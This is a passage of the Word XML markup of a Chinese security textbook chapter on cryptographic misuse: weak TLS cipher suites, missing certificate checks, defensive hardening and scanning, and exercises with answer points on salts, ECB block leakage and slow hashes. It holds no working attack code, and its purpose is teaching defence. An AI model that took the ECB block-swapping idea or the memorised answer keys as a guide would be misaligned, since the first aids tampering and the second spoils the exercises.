        <w:t xml:space="preserve">TLS_RSA_EXPORT_WITH_RC4_40_MD5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥交换未提供前向安全性（Forward</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrecy）：若服务器仅支持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥传输（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_RSA_WITH_AES_128_CBC_SHA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），一旦服务器私钥未来泄露，所有历史会话均可被解密。而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ECDHE（椭圆曲线</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Diffie-Hellman </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">临时）握手能保证每次连接使用临时的会话密钥，即使用“前向安全性”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">证书验证缺失或错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：客户端若不正确校验证书链（如忽略过期、自签名、主机名不匹配），则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的对端身份认证形同虚设。许多移动应用或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现中存在信任所有证书或禁用主机名验证的误用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：采用权威团队的现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置指南，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mozilla SSL Configuration Generator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（生成具体服务器软件配置文件）。强制禁用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS 1.0 / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1，仅启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS 1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3。密码套件列表仅包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">套件并优先</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECDHE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密钥交换，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（TLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3）。配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OCSP Stapling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">增强证书吊销检查，启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HSTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">避免降级。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用外部扫描工具如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SSL Labs Server Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（公开服务）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">testssl.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（脚本化，可用于内网授权评估）检测支持的协议、套件、证书链完整性。工具将输出弱套件、不支持前向安全性、证书信任等风险项。在渗透测试中，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测点也可识别部分异常。代码审计：检查应用内</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">客户端实现是否设置严格证书校验，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Android </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TrustManager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否盲目接受所有证书；禁用主机名验证（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HostnameVerifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）是常见误用。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">自动化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">管道中集成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">testssl.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mozilla Observatory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描，确保每次部署不引入弱配置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="257"/>
    <w:bookmarkStart w:id="258" w:name="习题-14"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：盐为何能使彩虹表失效？请结合彩虹表的时空权衡原理，说明加入随机盐后离线破解成本如何被放大。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回忆彩虹表是为特定散列函数预计算固定映射；盐是每个密码唯一的随机值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：彩虹表覆盖的是常见口令在无盐散列下的所有可能值。加入用户唯一盐后，同一口令在不同用户处的散列值完全不同，攻击者必须为每个盐值建立独立的彩虹表，而盐空间巨大（通常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位随机），预计算不可行。因此攻击被迫回到逐条试错的暴力破解，且必须针对每个用户分别执行。这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节“慢哈希</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">唯一盐”防御的核心。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式会泄露明文模式？请从分组密码工作模式的角度阐述，并给出一个现实场景中可能被利用的数据结构例子。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：考虑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对相同明文分组的输出以及常用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的结构。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ECB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">独立加密每个分组，相同输入得到相同输出，因此重复的明文分组在密文中体现为重复块。例如，一个存储用户角色的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{"role":"user","name":"Alice"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ECB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密（且对齐到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字节分组），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"role":"user",""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能构成重复块，攻击者可以通过置换密文块、观察重复等方式推断并可能篡改角色字段，即使不能解密。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：慢哈希函数（bcrypt,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">argon2）为何能防御离线爆破？阐述其核心机制并对比与普通哈希（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-256）的区别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：考虑攻击者计算一次猜测试的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU/内存代价，以及可调节成本因子。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：慢哈希故意消耗大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU（和/或内存）时间与资源，通过迭代（bcrypt）或内存硬性（argon2）使得单次哈希计算耗时数百毫秒甚至更长，让攻击者尝试数十亿条口令的时间成本变得不可接受，而合法服务器只需在登录时执行一次，影响微小。普通</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SHA-256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等快速哈希是通用设计，每秒可计算数亿次，极有利于攻击者。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（授权环境）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">testssl.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对你授权测试的内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器执行一次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">评估，输出一份包含支持的协议、密码套件、证书问题及前向安全性状态的报告。根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mozilla </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">现代配置建议，提出加固方案并在测试环境实施后重新扫描确认。该任务可结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Testing Guide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试案例进行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="258"/>
    <w:bookmarkStart w:id="259" w:name="小结-17"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">密码学误用多源于对原语假设的破坏：ECB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">丧失随机化，固定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打破不可预测性，弱随机摧毁密钥根基，RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">误用忽略填充完整性。每种误用都消解了加密本应提供的机密性、完整性或认证性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对称加密的正确实践是使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AEAD（AES-GCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ChaCha20-Poly1305），一次解决加密和认证；非对称加密必须遵循安全填充方案（RSA-OAEP、RSA-PSS）并保证密钥独立。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
